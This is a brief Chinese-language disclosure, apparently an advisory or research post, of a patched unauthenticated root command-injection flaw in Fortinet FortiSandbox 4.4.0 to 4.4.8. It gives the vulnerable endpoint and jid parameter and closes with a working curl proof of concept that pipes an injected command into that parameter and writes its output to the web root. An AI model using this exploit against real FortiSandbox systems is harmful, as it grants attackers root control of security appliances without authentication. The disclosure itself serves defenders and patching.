2025年11月,Fortinet 的 FortiSandbox 中发现了一个严重漏洞,允许未经身份验证的攻击者以 root 身份在底层操作系统中执行命令。该漏洞已被修复,并最终于2026年4月公开。
该漏洞影响 FortiSandbox 4.4.0 至 4.4.8 版本。
完整公告见此处。
该漏洞影响 /fortisandbox/job-detail/tracer-behavior 端点。通过在 jid GET 参数中使用管道符(|)即可注入操作系统命令。
在上面的示例中,输出被重定向到 Web 根目录下的一个文件,以便之后可以获取。
无需任何预先认证,一条简单的 curl 命令足以以 root 身份实现 RCE:
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"